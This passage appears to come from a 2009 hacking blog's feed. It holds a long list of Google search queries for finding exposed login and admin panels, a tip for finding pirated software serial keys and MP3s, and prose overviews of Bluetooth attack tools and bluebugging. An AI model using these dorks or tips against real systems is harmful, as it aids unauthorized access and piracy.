-demos&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”welcome to netware *” -site:novell.com&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”ZyXEL Prestige Router” “Enter password”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:Group-Office “Enter your username and password to login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:Login * Webmailer&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:Login intext:”RT is © Copyright”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:Node.List Win32.Version.3.11&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:plesk inurl:login.php3&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”1220/parse_xml.cgi?”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”:10000″ intext:webmin&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”Activex/default.htm” “Demo”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”calendar.asp?action=login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”gs/adminlogin.aspx”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”typo3/index.php?u=” -demo&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”usysinfo?login=true”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:”utilities/TreeView.asp”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:/admin/login.asp&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:/cgi-bin/sqwebmail?noframes=1&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:/Citrix/Nfuse17/&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:/dana-na/auth/welcome.html&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:/eprise/&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:/webedit.* intext:WebEdit Professional -html&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:1810 “Oracle Enterprise Manager”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:administrator “welcome to mambo”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:cgi-bin/ultimatebb.cgi?ubb=login&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:confixx inurl:login|anmeldung&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:coranto.cgi intitle:Login (Authorized Users Only)&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:default.asp intitle:”WebCommander”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:irc filetype:cgi cgi:irc&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:login filetype:swf swf&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:login.asp&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:login.cfm&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:login.php “SquirrelMail version”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:mewebmail&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:names.nsf?opendatabase&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:orasso.wwsso_app_admin.ls_login&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:postfixadmin intitle:”postfix admin” ext:php&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;inurl:search/admin.php&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Login (”Powered by Jetbox One CMS ª” | “Powered by Jetstream © *”)&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Novell NetWare intext:”netware management portal version”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Outlook Web Access (a better way)&lt;br /&gt;pcANYWHERE EXPRESS Java Client&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;PhotoPost PHP Upload&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;PHPhotoalbum Statistics&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;PHPhotoalbum Upload&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;phpWebMail&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Powered by INDEXU&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Ultima Online loginservers&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;url:”webadmin” filetype:nsf&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;W-Nailer Upload Area&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>Use Gooogle to Find Serial Keys</title><link>http://hackingwithme.blogspot.com/2009/04/use-gooogle-to-find-serial-keys_03.html</link><category>Google Hacking</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 21:30:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-6191341491795146542</guid><description>&lt;span class="Apple-style-span" style="font-family: Tahoma; color: rgb(80, 73, 69); font-size: 13px; line-height: 20px; "&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;let’s pretend you need a serial number for windows xp pro.&lt;br /&gt;in the search bar type in just like this - “Windows XP Professional” 94FBR&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of ‘fake’ porn sites that trick you.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;or if you want to find the serial for winzip 8.1 - “Winzip 8.1″ 94FBR&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;just try it out, it’s very quick and it works nicely….&lt;br /&gt;Here is another trick that works fairly decent for finding mp3’s on the web (which is hard to do normally, to say the least)&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;say you want to get, for example, a Garth Brooks song. type this in the search bar - “index of/” “garth brooks” .mp3 the ones you want to check out first are the ones that say “Index of/” in the title of the search result. this technique allows you to easily pull up web folders with direct downloads. it will look the same as if you were logging into a ftp url.. i’m sure you can be pretty flexible on how you type that in, so long as you include “index of/”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;i’m sure you can use this for more than just mp3’s (it’s not perfect but it has worked for me on a few occasions)&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;always make sure to use the quotations where i placed them. they help pinpoint the correct search results more accurately. just try it out, also if you want to learn how to do more with google look up “google hacks”&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Bluetooth Hacking Tools Part - I</title><link>http://hackingwithme.blogspot.com/2009/04/bluetooth-hacking-tools-part-i.html</link><category>Bluetooth Hacking</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 21:21:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-159879130185481807</guid><description>&lt;span class="Apple-style-span"   style=" color: rgb(80, 73, 69);  line-height: 20px; font-family:Tahoma;font-size:13px;"&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;There are some tools essential for bluetooth hacking purpose:&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;1. BlueScanner&lt;/strong&gt;: In this the tool hacker searches for bluetooth enable device. After that it will try to extract as much information as possible for each newly discovered device .&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;2. BlueSniff: &lt;/strong&gt;Blue Sniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;3. BlueBugger: &lt;/strong&gt;The buggers exploit the vulnerability of the device. The bluebugger is set for the bluetooth security holes found in some bluetooth- enabled device. They can access the images, phone-book , messages and other personal information.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;a href="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/mobilebluetoothhacking_wm.jpg" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;&lt;img class="aligncenter size-medium wp-image-212" title="Bluetooth hacking tools" src="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/mobilebluetoothhacking_wm-246x300.jpg" alt="Bluetooth hacking tools" width="246" height="300" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-style: initial; border-color: initial; margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; border-style: initial; border-color: initial; float: left; padding-top: 5px; padding-right: 5px; padding-bottom: 5px; padding-left: 5px; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(223, 226, 228); border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); background-position: initial initial; " /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;4. Bluesnarfer: &lt;/strong&gt;Bluesnarfing is a serious problem which is discovered in several Bluetooth-enabled mobile phones. If a Bluetooth of an device is switch on, then it is possible to connect to the phone without alerting the owner, and gain to access to restricted portions of the stored data .&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;5.&lt;/strong&gt;&lt;strong&gt; BlueDiving: &lt;/strong&gt;Bluediving is a Bluetooth penetration testing. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack. While also has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, L2CAP ,packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode .&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;6. Transient Bluetooth Environment Auditor :&lt;/strong&gt; T-BEAR is a security-auditing platform for the Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and also various cracking tools.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Their also some more hacking tools such as the &lt;strong&gt;BTBrowser, BTCrawler,&lt;br /&gt;Can I hack With Bluetooth (CIHWB), BTcrack, BlueTest, BTAudit&lt;/strong&gt;.&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Bluebugging: Type of Bluetooth Hacking</title><link>http://hackingwithme.blogspot.com/2009/04/bluebugging-type-of-bluetooth-hacking.html</link><category>Bluetooth Hacking</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 21:17:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-7587802700276996310</guid><description>&lt;span class="Apple-style-span" style="font-family: Tahoma; color: rgb(80, 73, 69); font-size: 13px; line-height: 20px; "&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Bluebugging&lt;/strong&gt; is one form of &lt;strong&gt;Bluetooth hacking&lt;/strong&gt; .It was first discovered German researcher &lt;strong&gt;Martin Herfurt &lt;/strong&gt;. He got the motivation from the Bluesnarf attack.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Bluebugging is very much different from the &lt;strong&gt;bluesnarfing.&lt;/strong&gt; In bluebugging allows an individuals to access the mobile phone commands using &lt;strong&gt;Bluetooth wireless technology &lt;/strong&gt;without knowing the phone’s user .The hacker can access the phone memory and connect internet without knowing the user . Hacker can also initiate phone calls, send and read SMS, listen the phone conversion. But here the hacker must be at r&lt;strong&gt;ange of 10 meters &lt;/strong&gt;while in bluesnarf it is upto 100 meters.&lt;/p&gt;&lt;div id="attachment_188" class="wp-caption aligncenter" style="width: 258px; "&gt;&lt;a href="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/367247f2601.jpg" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;&lt;img class="size-medium wp-image-188" title="Bluetooth Hacking: Bluebugging" src="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/367247f2601-180x300.jpg" alt=" Bluebugging" width="248" height="413" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-style: initial; border-color: initial; margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; border-style: initial; border-color: initial; float: left; padding-top: 5px; padding-right: 5px; padding-bottom: 5px; padding-left: 5px; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(223, 226, 228); border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); background-position: initial initial; " /&gt;&lt;/a&gt;&lt;p class="wp-caption-text" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Bluebugging&lt;/p&gt;&lt;/div&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Initially bluebugging was carried using the laptops. But as the technology as boomed it can be carried on powerful PDA’s and mobile devices. Futher &lt;strong&gt;development of bluebugging &lt;/strong&gt;tools the hacker can also take the control of victim’s phone. The hacker not only make call’s ,send MSG’s essentially do anything to the cell phone.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;In bluebugging ,the hacker search for the establishment of connection i.e it searches for switch on bluetooth&lt;strong&gt;cell phone&lt;/strong&gt; . 